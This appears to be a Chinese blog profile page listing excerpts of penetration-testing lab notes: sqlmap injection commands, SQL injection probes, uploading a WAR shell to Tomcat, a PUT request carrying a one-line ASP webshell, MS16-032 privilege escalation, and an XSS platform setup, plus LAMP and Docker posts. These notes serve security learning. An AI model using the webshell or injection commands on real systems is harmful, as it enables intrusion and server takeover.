- 博客(7)
- 收藏
- 关注
原创 docker安装
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
2021-09-17 10:25:07 108
原创 Sqlmap
Sqlmap1、Sqlmap对get请求数字型、字符型注入## 标题2、sqlmap对Get请求注入对http://www.whalwl.host:8001/bug/sql_injection/sql_num.php进行get注入命令python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” --dbs查询dwvs库表名命令:python sqlm
2020-12-31 20:46:20 729
原创 tomcat ,Weblogic
tomcat ,WeblogicTomcat上传war打开网站访问http://www.whalwl.host:18081/manager/html将shell.asp通过Java压缩为shell.war
2020-12-31 20:23:21 255
原创 Burp、awvs基础
Burp、awvs基础1.开启webdav利用iis写入权限开启文件的脚本权限,读写权限2、利用burp抓包上传木马http请求方法:GET、POST、PUT(上传)、MOVE(移动、重命名)、COPY(复制)、DELETE(删除)、LOCK(锁)抓包利用PUT上传木马文件<%eval request(“123”)%>PUT /abc1.txt http/1.1HOST:192.168.8.12911111111111111111111111111111<
2020-12-28 20:32:45 537
原创 利用ms16-032提权并打开3389端口
利用ms16-032提权并打开3389端口1、在VM中创建win 2003,在win2003上安装iis服务并开启服务2、配置iis服务3、上传源码及配置网站给put文件设置权限,添加iis访问权限设置默认访问页面 index.asp访问192.168.x.x4、修改checksql文件进行sql注入判断注入点http://192.168.8.130/shownews.asp?id=275 and 1=1http://192.168.8.130/shownews.asp?id=2
2020-12-27 20:33:35 1425
原创 ubuntu搭建lamp并安装WordPress
ubuntu搭建lamp并安装WordPress安装Ubuntu16.04版本2. 设置root密码命令 sudo passwd rootSu root3. 设置root账户远程ssh登入修改配置文件 路径 etc/ssh/sshd_config4.用xshell连接Ubuntu重启ssh服务 命令 sudo service ssh restart用xshell连接5.将源修改为阿里源,并更新备份源文件 # cp /etc/apt/source.list /etc/apt/so
2020-12-22 22:23:54 305
原创 xss平台的搭建
update oc_module set code=REPLACE(code,"http://xsser.me","http://127.0.0.1/xss");
2020-11-24 14:23:39 2172 4
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人